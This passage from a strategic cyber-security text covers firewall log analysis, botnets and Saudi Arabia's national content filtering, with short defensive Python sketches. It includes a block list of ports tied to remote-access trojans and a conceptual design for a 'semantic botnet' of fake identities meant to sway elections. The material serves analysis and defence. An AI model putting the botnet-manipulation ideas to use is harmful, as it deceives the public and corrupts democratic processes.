counter and recover from cyber attacks. 
At a minimum, this requires placing 86 From the Council of Europe Convention on Cybercrime website: http://conventions.coe.int/. 87 Lynn, 2010. 31 Cyber Security: A Short History all NATO bodies under centralized cyber protection, upgrading member state cyber defense capabilities, and coordinating the efforts of national and organizational cy- ber security resources.88 In fact, NATO may be the best place to begin answering the national security chal- lenge posed by cyber attacks. The Internet is now an international asset. As such, threats to it require an international response. As a large group of affluent nations with a shared political and military agenda,89 it is possible that NATO today could deal a significant blow to one of a hacker’s greatest advantages – anonymity.90 More Questions than Answers Although the first modern computer was designed at Cambridge in 1837, in many ways the Information Revolution has just begun. The World Wide Web, for example, is just twenty years old.91 As our use of and dependence on the Internet have grown, however, computer secu- rity has quickly evolved from a purely technical discipline to a geopolitical strategic concept. At the 2010 NATO Summit in Lisbon, twenty-eight world leaders declared that cyber attacks now threaten international prosperity, security, and stability. Moreover, in the future the consequences of a cyber attack may rise because the threat will affect national critical infrastructures of every kind. In our homes, the use of “smart grid” networks is proliferating. And in our militaries, the production of IP-enabled munitions, such as unmanned aircraft, is outpacing that of their manned counterparts, meaning that even warfare is now managed remotely via the Inter- net.92 As national security thinkers attempt to defend their interests in cyberspace, a key to success will be to bridge the gap between cyber strategy and cyber tactics. Goals such as the security of national critical infrastructures and strategies like military deterrence and arms control demand a greater appreciation for the capabilities and challenges of computer scientists, who fight their battles on the front lines of cryp- tography, intrusion detection, reverse engineering, and other highly technical dis- ciplines. 88 “Active Engagement...” 2010. 89 NATO is much larger than its 28 Member Countries. It also encompasses 22 members of the Euro- Atlantic Partnership Council, 7 Mediterranean Dialogue, 4 Istanbul Cooperation Initiative, and 4 Contact Countries. 90 Three areas of obvious collaboration could be in network security, law enforcement and counterintelligence. 91 The Web was conceived at the European Organization for Nuclear Research (CERN) in 1990. 92 Orton, 2009. 32 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY The quest for strategic cyber security began in Cambridge and paused most recently in Lisbon, but for emerging policies to reflect technical realities, policymakers must return to Cambridge. 33 Cyber Security: A Technical Primer 3. CYBER SECURITY: A TECHNICAL PRIMER Chapter 2 demonstrated that cyber security has evolved from a purely technical dis- cipline to a strategic, geopolitical concept that can directly impact national security. Nonetheless, at the tactical level cyber security remains a highly technical discipline that is difficult to understand for those without a formal education in computer sci- ence or information technology. 
Therefore, before this research examines the real-world impact of cyber attacks and explores strategic threat mitigation strategies, Chapter 3 will introduce the reader to the basics of cyber security analysis, macro-scale hacking, the case-study of Saudi Arabia, and cyber defense exercises. Hopefully, a greater appreciation for the challenges of computer science will help policy makers to bridge the gap between tactical and strategic cyber security thinking.

Cyber Security Analysis

To introduce the reader to the topic of cyber security analysis, the author will briefly analyze his own personal firewall log.93

93 This analysis is of a Zone Alarm personal firewall log that contains 12,700 record entries from 31 DEC 2000 to 23 JAN 2003.

Almost everyone today has a personal or "host" firewall installed on his or her computer. It protects both the computer and its user from unwanted network activity. Technically speaking, it accepts or rejects incoming data "packets." Professional computer security analysts examine the log files, or recorded events, of firewalls and other computing devices for signs of suspicious activity.

Most of the recorded network traffic is non-malicious even if it may be unsolicited and unwanted. For example, an Internet Service Provider (ISP) may "scan" its clients' computers for policy violations such as hosting an unauthorized Web server. Businesses go to extraordinary and sometimes unethical lengths to gather in-depth information about computers and their users, such as which operating system they use and what type of movies they prefer, for advertising purposes.

Firewall logs can be viewed in many different ways. A security analyst can sort them by country, for example, to identify blocked traffic by world geography.94

94 My firewall had blocked traffic from over 70 foreign countries.

COUNTRY     FAILED ACCESS
Canada      121
Brazil      115
France       93
Taiwan       46
Poland       21

Countries robust in international network infrastructure, such as Canada and Taiwan, will always appear in network traffic. Connections to or from more isolated countries, especially when no logical business relationship can be identified, require close scrutiny.

For a more detailed view, IP addresses can be associated with a specific network.

IP ADDRESS       FAIL   OWNER
141.76.XX.XX       25   Tech Univ Informatik, Dresden, Germany
203.241.XX.XX      18   Samsung Networks Inc., Seoul, Korea
212.19.XX.XX       12   Tribute MultiMedia, Amsterdam, Netherlands
61.172.XX.XX        8   CHINANET Shanghai province network
192.58.XX.XX        5   University of California, Berkeley

Unfortunately for the analyst, most computer network logs contain many potential threats to investigate.

The IP addresses listed in a log file are not always the true source of network traffic. Obtaining reliable "attribution" is one of the most frustrating aspects of cyber attacks, as hackers often forge or "spoof" the IP address of an unwitting, third party network. This is possible because Internet routers, for the sake of efficiency, normally only use a data packet's destination address to forward it across the Internet and disregard the source address. How to improve attribution is one of the hottest topics in cyber defense research.

At a minimum, security analysts must use a combination of technical databases such as WHOIS,95 non-technical Web tools such as a good Internet search engine, and common sense, which helps to verify whether the discovered network traffic corresponds logically to real life activity.

95 WHOIS can tell you the owner of an Internet Protocol (IP) address.
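The sorting shown in the tables above is easy to automate. The following is a minimal sketch rather than the author's actual tooling: it assumes the firewall log has been exported to a CSV file (here called firewall_log.csv) with hypothetical action, direction, and src_ip columns, and it simply tallies how often each remote address was blocked. Associating the resulting addresses with countries or owners is a separate lookup step, as described above.

#!/usr/bin/env python3
"""Count blocked inbound connections per source IP in a firewall log export.

A minimal sketch, not the author's tooling: it assumes the log was exported to
CSV with hypothetical 'action', 'direction', and 'src_ip' columns (real
ZoneAlarm logs use a different layout).
"""
import csv
from collections import Counter

def failed_access_by_ip(path: str) -> Counter:
    counts = Counter()
    with open(path, newline="") as fh:
        for row in csv.DictReader(fh):
            # Keep only inbound packets the firewall rejected.
            if row.get("action") == "BLOCK" and row.get("direction") == "IN":
                counts[row["src_ip"]] += 1
    return counts

if __name__ == "__main__":
    print(f"{'IP ADDRESS':<18}{'FAIL':>6}")
    for ip, fails in failed_access_by_ip("firewall_log.csv").most_common(5):
        print(f"{ip:<18}{fails:>6}")

The same tally, grouped by the country or network owner returned from a lookup step, reproduces the two tables above.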
Firewalls are designed to block many types of suspicious traffic automatically, and often they will prohibit everything that a user does not specifically allow. For example, there are over 65,000 computer "ports," or points of entry, into an operating system. By default, my firewall blocked access to the following notorious ports that are associated with "trojans," or hacker programs that allow illicit remote access to a victim computer.

PORT     TROJAN
1243     SubSeven
1524     Trinoo
3128     RingZero
27374    Ramen
31337    Back Orifice

Blocking known malicious traffic seems easy enough, but hackers are adept at subverting whatever connections are allowed onto your computer. For example, the Internet Control Message Protocol (ICMP), commonly used for network management, is fairly simple in design and would seem amenable to security observation. However, hackers routinely use it for target reconnaissance, Denial of Service (DoS) attacks, and even as a covert channel for communications.

Analyzing outbound traffic is just as important as inbound traffic, if not more so. To begin, a security analyst should sort outbound firewall log data by the names of the programs installed on the computer. He or she should verify that legitimate programs are only contacting legitimate IP addresses, e.g., Microsoft Word should only contact Microsoft.

All unrecognizable programs should be examined closely. Often, quick Internet searches will suffice. However, if there is no proper (and reassuring) description for a program on the Web, it should be disallowed from contacting the Internet, if not uninstalled from the computer altogether.

My firewall log showed that one unidentifiable program, ISA v 1.0, had tried to contact a remote computer in both China and France. I could not find any information about the program on the Web, so I deleted it from the system.

PROG      IP ADDRESS    DESTINATION                    DATE
ISA 1.0   61.140.X.X    Chinanet Guangdong province    7/30/2001
ISA 1.0   193.54.X.X    Universite Paris, France       8/10/2001

Another program, WINSIP32.EXE, had tried three times to connect to a U.S. government agency, the General Services Administration (GSA).96 A further red flag was that the name of the program was suspiciously close to WINZIP, a common program used to minimize file size for transmission via the Internet. I tried unsuccessfully to discuss the issue with a GSA system administrator, who almost certainly managed a hacked network.

DATE       TIME      PROGRAM       REMOTE IP ADDRESS
2/18/2002  20:17:06  WINSIP32.EXE  159.142.XX.XX
3/15/2002  07:06:17  WINSIP32.EXE  159.142.XX.XX
3/20/2002  14:54:39  WINSIP32.EXE  159.142.XX.XX

The level of technical expertise and experience required to thoroughly evaluate computer network security is high. An analyst must understand hardware and software, as well as Internet protocols, standards, and services. Security is an art as well as a science that involves common sense, original research, risk management, and a willingness to pick up the phone and speak with unknown system administrators.

In fact, the problem of attribution is the most complicating factor in cyber threat analysis. If the attacker is careless and leaves a large digital footprint (e.g., his home IP address), law enforcement may be able to take quick action.
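Those first attribution clues can often be gathered in seconds with two standard lookups. The sketch below is illustrative only: it performs a reverse DNS query and a raw WHOIS query (RFC 3912, TCP port 43) against a placeholder address in the documentation range; the whois.arin.net server is one of several regional registries, and a spoofed source address will, of course, mislead both checks.

#!/usr/bin/env python3
"""Gather quick attribution clues for a suspect IP address.

A sketch under assumptions: reverse DNS and a raw WHOIS query give first hints
about the owning network; the server name and sample address are illustrative.
"""
import socket

def reverse_dns(ip: str) -> str:
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return "no PTR record"

def whois(ip: str, server: str = "whois.arin.net") -> str:
    # RFC 3912: send the query plus CRLF, then read until the server closes.
    with socket.create_connection((server, 43), timeout=10) as s:
        s.sendall((ip + "\r\n").encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

if __name__ == "__main__":
    suspect = "192.0.2.1"          # documentation range; substitute a logged source IP
    print("Reverse DNS:", reverse_dns(suspect))
    print(whois(suspect)[:500])    # the first lines usually name the registered owner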
If the cyber attacker is smart and covers his digital tracks, then deterrence, evidence collection, and pros- ecution become major challenges. In almost all cases, computer log files alone do not suffice. Unmasking a cyber at- tacker requires the fusion of cyber and non-cyber data points. Investigators must enter the real world if they want to arrest a computer hacker. There will always be clues. If the goal is extortion, where is the money to be paid, and is there a point- of-contact? If the threat is Denial of Service, the target could ask for a proof of ca- pability. The point is to generate a level of interactivity with the cyber threat actor that might be used against it. Further, cross-checking suspect information against trusted sources is always one of the best defenses. In this chapter, the author has tried to make clear that catching a computer hacker is not a simple chore. Cyber attackers are often able to hide in network traffic and remain anonymous to their victims. Still, this does not mean that cyber attacks can easily rise to the level of a strategic threat; but it does mean that, when they do, national se- curity leaders can be in the awkward position of not knowing who is attacking them. This is the topic of the next chapter. 96 GSA supports the basic functioning of other federal agencies. 37 Cyber Security: A Technical Primer Macro-Scale Hacking If one successfully attacked computer can pose a security threat, what if an adver- sary could secretly command thousands or even millions of computers at once? At what point does a tactical cyber attack become a strategic cyber attack? In fact, these are no longer academic questions. The Conficker worm is now esti- mated to have compromised at least seven million computers worldwide,97 leaving an unknown cyber attacker, in theory, in control of their aggregated computer pro- cessing power. “Botnets” are networks of hacker-controlled computers that are organized within a common Command and Control (C2) infrastructure.98 Hackers often use botnets to send spam, spread malicious code, steal data, and conduct Denial of Service (DoS) attacks against other computers and networks around the world. In the future, botnets may be used to conduct more complex and far-reaching at- tacks, some of which could have national security ramifications. One scenario, dem- onstrated in 2009 by the author and Roelof Temmingh,99 envisioned a “semantic botnet,” composed of a virtual army of randomly-generated and/or stolen human identities,100 which could be used to support any personal, political, military, or ter- rorist agenda.101 Such a cyber attack is possible because humans now communicate via ubiquitous software that is by nature impersonal and non-interactive. A botnet made up of thousands or millions of computers could be used to post a wide range of informa- tion, opinions, arguments, or threats across the Internet. These could target a per- son, an organization, or a nation-state and promote any political or criminal cause. The amplification power of the Internet guarantees that not every victim must fall for the scam; a certain percentage will suffice. Most of the information found on the Internet is open to theft and/or abuse. Hack- ers can steal any type of file, text, or graphics and alter it for nefarious purposes. Although effective authentication technologies such as digital signatures exist, they are rarely used for common communications. 97 Piscitello, 2010. 98 Freiling et al, 2005. 99 Temmingh is the founder of Sensepost and Paterva. 
Their 2009 paper was presented at the CCD CoE Conference on Cyber Warfare. 100 Ramaswamy, 2006. In 2006, identity theft was already the fastest-growing crime in the United States, affecting almost 20,000 persons per day. Acoca, 2008. Nearly a third of all adults in the U.S. reported that security fears had compelled them to shop online less or not at all. 101 Geers & Temmingh, 2009. 38 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY The calculated, political manipulation of information, which is today most often found in the form of computer data, is not uncommon. In 2006, Reuters news ser- vice, prior to publishing a photo, darkened the sky over Beirut to make an Israeli air raid appear more dramatic;102 in 2008, newspapers published a photo of an Iranian missile test in which an extra missile had been added;103 and in 2010, Al-Ahram newspaper in Cairo printed a photo after it had switched the places of Presidents Obama and Mubarak at the White House.104 Without some kind of technical means of verification, it can be difficult even for writers and photographers to know that their own work has not been modified. Distinguishing fact from fiction – and humans from robots – is difficult online, espe- cially in a timely and accurate way. Hackers will exploit the maze-like architecture of the Internet, and the anonymity it offers, to make threat evaluation slow and labor-intensive. In short, there is no quick way to determine whether a virtual person really exists. Over time, a fraudulent virtual identity would even come to have a “life” of its own as it posts a variety of information to the Web. Historically, computers have had great difficulty impersonating a human being. In 1950, Alan Turing wrote that even the “dullest” human could outperform a com- puter in a conversation with another human, and that a machine could not provide a “meaningful answer” to a truly wide variety of questions. The celebrated Turing Test was born.105 However, Internet communications are increasingly impersonal conversations. This creates an attack space for a hacker because there is normally insufficient content and interactivity to evaluate whether a particular message was posted by a human or a machine. The average computer programmer could never pass the Turing Test, but he or she could write a program to update the world via Twitter on how a fraudulent Web user is spending her day, or what she thinks about a political leader. Every day, email is losing ground to new media such as YouTube, Facebook, and Twitter. Although the opportunity to cross-examine someone by email is limited, it does exist; email is typically interactive, one-to-one correspondence.106 The new communication models are not one-to-one, but one-to-many or many-to-one. Users feel empowered as they quickly become a prolific producer of digital information; 102 Montagne, 2006. 103 Nizza & Lyons, 2008. 104 “Doctoring photos...” 2010. 105 Oppy & Dowe, 2008. 106 Internet Relay Chat (IRC) is also interactive, but it was never a mainstream form of communication. 39 Cyber Security: A Technical Primer however, much of the output is trivial, and there is a loss of intimacy and interactiv- ity. This benefits a cyber attacker, who can push information to the Web that would not be subject to serious cross-examination. Due to the speed of modern communications, humans do not have much time to analyze what they read on the Web. Was a message posted by a human or a ma- chine? 
It will be hard to know when even highly idiomatic language can be stolen and repackaged by a hacker. And Natural Language Processing, or the computer analysis of human languages, is still unproven technology that requires significant human oversight to be effective.107 It is increasingly difficult to separate cyberspace from what we think of as the real world; human beings respond to stimuli from both. If a botnet were used to promote a political or military goal, once a certain momentum toward the desired goal were attained – that is, if real people began to follow the robots – the attacker could then begin to scale back the Artificial Intelligence (AI) and reprogram the botnet for its next assignment. It may not matter if the botnet campaign could eventually be discovered and dis- credited. In time-sensitive contexts such as an election it might be too late. The at- tacker may desire to sway public opinion only for a short period of time. In the week before an election, what if both left and right-wing blogs were seeded with false but credible information about one of the candidates? It could tip the balance in a close race to determine the winner. Consider the enormous impact of the 2004 Madrid train bombings on Spain’s national elections, which took place three days later.108 Roelof Temmingh, who is a brilliant programmer, wrote a complex, copy-and-paste algorithm to collect biographical information and facial images from various web- sites and used them to construct skeletons of randomized, artificial personalities. Personal profiles, including categories such “favorite movie,” were added based on details from popular news sites. In future versions of the software, these fraudulent identities would begin to interact with the Web. This is the most difficult step, but far from impossible to implement. Over time, each new identity would assume a virtual “life” of its own. Phishing attacks are successful even though they normally employ only one layer of deceit – the website itself. Intelligent attackers can weave a much more intricate web of deception than that; an entire organization could successfully be faked if the time were taken to invest in enough third-party references. 107 Author interview with Temmingh, 2009. 108 “Europe...” 2004. 40 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY One of the primary reasons that such a cyber attack could succeed is the growing power of Web-enabled Open Source Intelligence (OSINT). The average Web user to- day has access to a staggering amount of information. Beginning with only a name, a good OSINT researcher can quickly obtain date-of-birth, address, education, medi- cal records, and much more. Via social networking sites, the attacker may even dis- cover intimate details of a person’s life, including where he or she might physically be at any given moment. Eventually, a web of connections to other people, places, and things can be constructed. Computer hackers are not only able to conduct OSINT via the Web, but also exploit the technical vulnerabilities of the Web to target their victims. Hackers “enumerate,” or conduct in-depth technical reconnaissance, against cyber targets, for information such as an IP address, a timestamp, or other “metadata” that can be exploited in the real world. A semantic botnet could enhance the credibility of any agenda. 
For example, if the target were an international energy corporation, OSINT might reveal a wide range of attack vectors: disgruntled employees, friction with indigenous populations, whistle blowers, or ongoing lawsuits. The botnet army could be used to target all of the above, via blogs, posting comments to news articles, sending targeted email, etc. (The corporation, of course, could hire its own botnet army in retaliation.) The chal- lenge for the attacker would be to make the communications as realistic as possible while making identity verification a complex and time-consuming challenge. Given the size of cyberspace and the speed at which data packets travel, one of the primary ways to combat a macro-scale cyber threat is by statistical analysis. A secu- rity analyst must use advanced mathematics to identify and counter cyber threats. In an election, humans typically vote in a “bell curve.” Some people are extremists, but most tend to vote for a party somewhere in the middle of the political spectrum. If a botnet controller does not simulate this tendency, statistical analysis of network traffic and internal databases can quickly reveal divergences that could suggest a tainted vote. These include a randomized voting preference (i.e., too many votes on the extremes), demographic anomalies, or strange patterns such as too many votes during normal human working hours. Technical data should not conflict with a security analyst’s common sense. IP ad- dresses must be scattered realistically within the voting space. Internet browsers should manage website visits as a human would, pausing for images to load and allowing time for a user to read important information. Automated computer pro- grams may move too quickly and “mechanically” from one data request to the next. A security analyst should investigate anomalies for other non-human properties. 41 Cyber Security: A Technical Primer The primary challenge to a statistical cyber defense strategy is a mathematically- gifted attacker. In theory, it is possible to give a botnet army a range of dynamic characteristics that are based on real-time analysis of current news and entertain- ment media. However, this is not easy to program, and an attacker can never be completely sure what a security analyst is looking for. An attack always requires some guesswork and miscalculation. Over time, this is a game of cat-and-mouse. A security analyst can write a sophisti- cated algorithm that correlates many factors, such as name, vote, geography, educa- tion, income, and IP address, to known or expected baselines. However, a botnet controller can do the same. One pitfall for the attacker is that, if the bots vote too realistically, or if there are too few bots involved in the attack, there should be a correspondingly small impact on the election. Moreover, in order to mirror real Internet traffic patterns, a botnet needs to be both large and sophisticated. Of course, there are some purely technical investments to be made, including the increased use of Public Key Infrastructure (PKI), biometrics and Internet Protocol version 6 (IPv6). Neural networks, for example, have played a considerable role in reducing credit card fraud.109 For important business transactions, the simple use of a live video feed is beneficial. Unfortunately, the use of good cyber defense tactics and technologies is rare. Most system administrators do not have the time, expertise, or staff to undertake a so- phisticated analysis of their own networks and data. 
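The simplest of the statistical checks described above can be written in a few lines. In the Python sketch that follows, the toy vote log, the "working hours" window, and the alert threshold are all assumed, illustrative values rather than figures drawn from any real analysis.

```python
from datetime import datetime

# Assumed toy vote log: (timestamp, preference on a -5 to +5 left/right scale).
VOTES = [
    (datetime(2011, 3, 14, 3, 12), 5),
    (datetime(2011, 3, 14, 3, 13), -5),
    (datetime(2011, 3, 14, 10, 40), 1),
    (datetime(2011, 3, 14, 20, 5), 0),
]

WORKING_HOURS = range(9, 18)   # assumed "normal working hours" window
ALERT_THRESHOLD = 0.5          # assumed share above which an analyst is alerted

def flag_anomalies(votes):
    """Crude indicators that a sample of votes may not be human-generated."""
    total = len(votes) or 1
    extreme_share = sum(1 for _, pref in votes if abs(pref) >= 4) / total
    office_share = sum(1 for ts, _ in votes if ts.hour in WORKING_HOURS) / total
    return {
        "extreme_share": extreme_share,       # too many votes on the extremes
        "office_hours_share": office_share,   # too many votes during working hours
        "flag_for_analyst": max(extreme_share, office_share) > ALERT_THRESHOLD,
    }

print(flag_anomalies(VOTES))
```

A real defense would correlate many more factors (name, geography, education, income, IP address), as described above; the point is only that such checks are cheap to automate.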
For the foreseeable future, much of the burden is on individual web users to recognize threats emanating from cyberspace and take action (or inaction) to counter them. This chapter has tried to argue that macro-scale cyber attack threats are serious, but most, such as the theoretical botnet army described in this chapter, do not yet pose a threat to national security. It is possible to create one fraudulent web identity, so millions of them could already exist. However, what makes many categories of cyber attack easy – the ubiquity, vulnerability, and anonymity of the web – can also lessen the credibility of a cyber threat. Good OSINT can lead to a significant bluff. To a large extent, the most dangerous threat actors are those with the ability to bridge the gap between the virtual and physical worlds. Thus, there are two impor- tant categories of cyber attacker: those who have “reach” into the real world, and those whose threats are limited to cyberspace. The trouble from a strategic, national 109 Rowland, 2002. 42 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY security perspective is that foreign intelligence services and militaries possess that kind of reach, which obviously can make a cyber attack much more serious. All things considered, cyber attacks have the potential to rise to the level of a stra- tegic threat. Therefore, they must be addressed by national security planners. The next chapter will examine how one nation-state, Saudi Arabia, has attempted to miti- gate this threat at the national level. Case Study: Saudi Arabia Every country has a unique perspective on security, especially a country as tradi- tion-bound as Saudi Arabia. But at the technical level, the quest for strategic cyber security mostly comprises the exact same elements: computer hardware, software, legal authority, system administrators, and cyber security experts. Therefore, Saudi Arabia, where there is a strong perception of a close connection between computer security and national security, provides an instructive example. The Saudi government censors a wide range of information based on a mix of mo- rality, security, and politics. It has built a national firewall designed to keep “inap- propriate” web content out of the country, inaccessible from anywhere within its borders, at any time, in public or private spaces. However, from both a semantic and a technical perspective, it is difficult, especially in authoritarian countries, to bal- ance the public’s need and desire for information with the government’s need and desire to maintain information control. Myriad technologies exist that can circumvent or even punch a hole straight through the Saudi national firewall. These include international telephone calls to foreign Internet Service Providers (ISPs), hacking Internet protocols, pseudonymous email accounts and remailers, direct-to-satellite access, peer-to-peer networking, anony- mous proxy servers, encryption, steganography, and more. As censorship circum- vention tools, all have strengths and weaknesses, and none of them is perfect. Specific software applications are not prohibited in the Kingdom per se. For ex- ample, the King Abdul-Aziz City for Science and Technology (KACST) explained that Internet chat programs are allowed unless the software in question is specifically linked to the distribution of pornography.110 Content-filtering on a national scale is a monumental task. 
The Saudi government built a national proxy server111 at KACST to surveil the nation’s Internet traffic for 110 “The Internet...” Human Rights Watch. 111 Or a single, centralized connection between Saudi Arabia and the outside world, capable of censoring undesirable information. 43 Cyber Security: A Technical Primer “appropriateness” according to Muslim values, traditions, and culture.112 Internet Service Providers must conform to these rules in order to obtain an operating li- cense.113 Such laws are easier to enforce in some countries than others. In Saudi Arabia, the effort is greatly facilitated by the fact that the entire telecommunications network, including international gateways, are owned and operated by the government.114 Saudi Arabia is home to some of the most educated citizens in the Arab world. Fur- thermore, Saudis routinely communicate with each other and with the outside world on a modern and sophisticated telecommunications infrastructure.115 The Kingdom has been connected to the Internet since 1994, but until 1999 access was restricted to state, academic, medical, and research facilities.116 Today, home accounts are wide- spread, and there are hundreds of cyber cafes in the country. Men and women are both active Web surfers, and their average daily time online is over three hours.117 The amount of data processed by KACST every day is so great that the national firewall took two years to build. Due to the sensitive nature of its mission, the entire project is housed under one roof. Technicians are imported from places like the USA and Scandinavia,118 but the censors handing out directives regarding what Web content to block are exclusively Saudi Arabian.119 KACST is analogous to a national post office through which all domestic and in- ternational correspondence must travel. There are now dozens of private ISPs in Saudi Arabia.120 However, KACST is the country’s only officially sanctioned link to the Internet, and all ISPs must route their traffic through its gateway.121 Electronic data is unlike traditional mail in that it is broken into small packets to increase the speed with which it travels through cyberspace, but these packets are reassembled at KACST for inspection.122 From the beginning, KACST’s goals were ambitious. Its president, Saleh Abdulrah- man al-‘Adhel, said that, before his organization would turn on the switch to the 112 Whitaker, 2000. 113 “Saudi Arabian Response...” Virginia Tech. 114 “Cybercensorship...” Human Rights Watch. 115 Dobbs, 2001. 116 Gavi, 1999 and 2002. 117 “Saudi Arabia to double...” 2001. 118 Gardner, 2000. 119 “SafeWeb...” 2000. 120 “The Internet...” Human Rights Watch. 121 “Losing...” 2001. 122 “How Users...” Human Rights Watch. 44 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Internet, KACST would try to eliminate all of the Internet’s negative aspects.123 How- ever, KACST technicians knew that they could not accomplish these goals without strictly regulating the behavior of individual users. Therefore, they forbade the sending or receiving of encrypted information as well as the sharing of usernames and passwords.124 Saudi Arabia’s first line of defense is a list of banned URLs that are explicitly denied when requested by a user from a browser window.125 Many websites commonly ac- cessed outside Saudi Arabia are forbidden. For those websites that are allowed through the filter, Web users access “cached” copies of Internet sites on government-controlled web servers physically located in the country. 
When a user attempts to visit a website that has not been evaluated by KACST cen- sors, a second stage of the content-filtering system is activated. Software automati- cally examines the site’s content for prohibited words before the request is granted. One of the first is the presence of a “stop word” on the homepage.126 A list of banned topics stops the request from getting through the KACST proxy server. There are at least thirty categories of prohibited information,127 and the number of banned sites goes well into the hundreds of thousands.128 When access to a site is denied, either because its URL is already on the banned list or it is found to contain objectionable material, a pop-up warning window ap- pears on the screen. It informs the user in both Arabic and English, “Access to the requested URL is not allowed!”129 It also informs the user that all Web requests are logged.130 The second warning is important, because law enforcement can, with an IP address, find the computer terminal in question and possibly also locate the end user. This is why in many countries publicly available Internet terminals that allow for easy, anonymous web surfing, are scarce.131 The two-stage system described above is the one advertised by the Saudi govern- ment. However, there are more stifling approaches to censorship, such as the use of a “whitelist,” of which the Saudi government has been accused. Blacklists ban 123 “Saudi Arabian Response...” Virginia Tech. 124 “The Internet...” Human Rights Watch. 125 “The Internet...” Human Rights Watch. 126 “Government-Imposed...” 127 “Losing...” 2001. 128 “Saudi Arabia to double...” 2001. 129 Lee, 2001. 130 Gavi, 1999 and 2002. 131 “How Users...” Human Rights Watch. 45 Cyber Security: A Technical Primer material based on the fact that it has been officially reviewed and deemed to contain inappropriate content.132 Whitelisting, a far stricter policy, takes a dramatically dif- ferent approach, banning everything that is not explicitly allowed.133 In other words, there is no need for a two-stage system. When a user tries to visit an unfamiliar webpage, there is simply no response. The only accessible websites have been pre- approved by the government. Some reporting has quoted “industry insiders” as stat- ing that an internal KACST committee officially sanctions a list of “desirable” sites, and all others have been banned by default.134 With such power over Saudi networks, KACST has the ability to do far more than simple website content filtering. In theory, KACST network administrators can read, block, delete, or alter network traffic based on email address, IP address, or key- words in the message. For example, if “royal family” and “corrupt” were found to exist in the same sentence, such a message could be flagged for closer inspection, perhaps by law enforcement authorities.135 Technical support for such a large system requires an enormous effort. At least ten companies from four foreign countries have played a role in its administration, in- cluding Secure Computing, Symantec, Websense, Surf Control, and N2H2.136 Secure Computing’s software is called SmartFilter. Saudi Arabia began using it as soon as the country was officially connected to the Internet in February 1999. SmartFilter ships with default content categories like pornography and gambling, but it was selected by KACST due to its overall ease of customization. 
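In outline, the two-stage system amounts to a blacklist lookup followed by a content scan. The Python sketch below illustrates only that logic; the banned hosts and stop words are invented, and the real KACST lists, categories, and matching rules are far larger and are not public.

```python
BANNED_URLS = {"www.blocked-example.org"}   # stage one: explicitly banned sites (invented)
STOP_WORDS = {"casino", "gambling"}         # stage two: banned topics (invented)

DENIAL_NOTICE = "Access to the requested URL is not allowed!"

def filter_request(url: str, fetch_page) -> str:
    """Return the page if allowed, otherwise the denial notice.

    `fetch_page` stands in for the proxy retrieving the page on the user's behalf.
    """
    host = url.split("/")[0].lower()
    if host in BANNED_URLS:        # stage one: URL already on the banned list
        return DENIAL_NOTICE
    page = fetch_page(url)         # stage two: unevaluated site, inspect its content
    if any(word in page.lower() for word in STOP_WORDS):
        return DENIAL_NOTICE
    return page

# Toy usage with a stand-in fetcher:
print(filter_request("news.example.com/front", lambda u: "daily headlines"))
print(filter_request("news.example.com/odds", lambda u: "casino odds tonight"))
```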
An example of widely-used, open source censorship software is DansGuardian, which is advertised as sophisticated, free Internet surveillance, to create “a cleaner, safer, place for you and your children.” Its settings can be configured from “un- obstructive” to “draconian,” and it can filter data by technical specifications such 132 Such as the words “government” and “corrupt” appearing in the same sentence. From a censor’s perspective, the problem with blacklisting is that it can be easy to fool the system, for example by simply misspelling those words: i.e. “govrment” and “korrupt.” 133 “Government-Imposed...” 134 “The Internet...” Human Rights Watch. 135 “How Users...” Human Rights Watch. 136 There are many content filtering software products to choose from, including 8e6, CensorNet, Content Keeper, Cyber Patrol, Cyber Sentinel, DansGuardian, Fortinet, Internet Sheriff, K9, N2H2, Naomi, Net Nanny, SmartFilter, squidGuard, Surf Control, We-Blocker, Websense, and more. Each can be configured for a single schoolroom or an entire nation-state. 46 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY as URL, IP, domain, user, content, file extension, and POST. There are many more advanced features to choose from.137 Privacy advocates criticize the software companies that create such tools, but indus- try representatives counter that their products are politically neutral. According to an executive at Secure Computing, “We can’t enforce how they use it.”138 Pornography is the first topic Saudi authorities mention when asked about Internet censorship. And KACST claims that the battle against pornography has been suc- cessful.139 But according to human rights groups, Saudi Arabia also disallows many political sites.140 A case in point is the website of a London-based dissident group called the Move- ment for Islamic Reform in Arabia (MIRA) (www.islah.org). MIRA’s IP address was on KACST’s list of banned sites, which was apparent in MIRA’s computer log files. MIRA decided to change its IP address, and immediately the site was available again inside Saudi Arabia. (MIRA did not know why the second stage of KACST’s system was not able to block the website based on content.) Eventually, the new IP address was discovered by KACST technicians, who blocked it again. This process repeated itself many times over; on average, MIRA was able to stay ahead of the government for about a week at a time. Its challenge was to make interested Saudi citizens aware of its new address before the block was in place again.141 MIRA was not satisfied with this protracted game of hide-and-seek, so its webmas- ters developed better solutions. First, the site randomized its port numbers, adding more than 60,000 possible Web addresses (equal to the number of available ports on a computer) to each new IP address. This change made it more difficult for KACST to do its detective work, since the Web requests leaving Saudi Arabia for MIRA were not necessarily headed for port 80, which normally hosts websites.142 Next, MIRA developed a novel way to let its followers know the new address. Its email server, islah@islah.org, would respond to a blank email with an automatic reply, containing the IP and port number. 
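The auto-reply mechanism is simple enough to sketch. In the Python example below, the mail relay, recipient handling, and current address are placeholders, since MIRA's actual implementation is not described; the point is only that a one-screen script can keep followers informed of a moving target.

```python
import smtplib
from email.message import EmailMessage

CURRENT_ADDRESS = "203.0.113.7:61923"   # placeholder for the site's latest IP and port
SMTP_RELAY = "mail.example.org"         # placeholder outgoing mail server

def reply_with_current_address(requester: str) -> None:
    """Answer a blank e-mail with the site's current IP and port."""
    msg = EmailMessage()
    msg["From"] = "islah@islah.org"
    msg["To"] = requester
    msg["Subject"] = "Current address"
    msg.set_content(f"The site is currently reachable at {CURRENT_ADDRESS}")
    with smtplib.SMTP(SMTP_RELAY) as smtp:
        smtp.send_message(msg)

# A mail-handling hook would call this each time a blank message arrived, e.g.:
# reply_with_current_address("reader@example.net")
```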
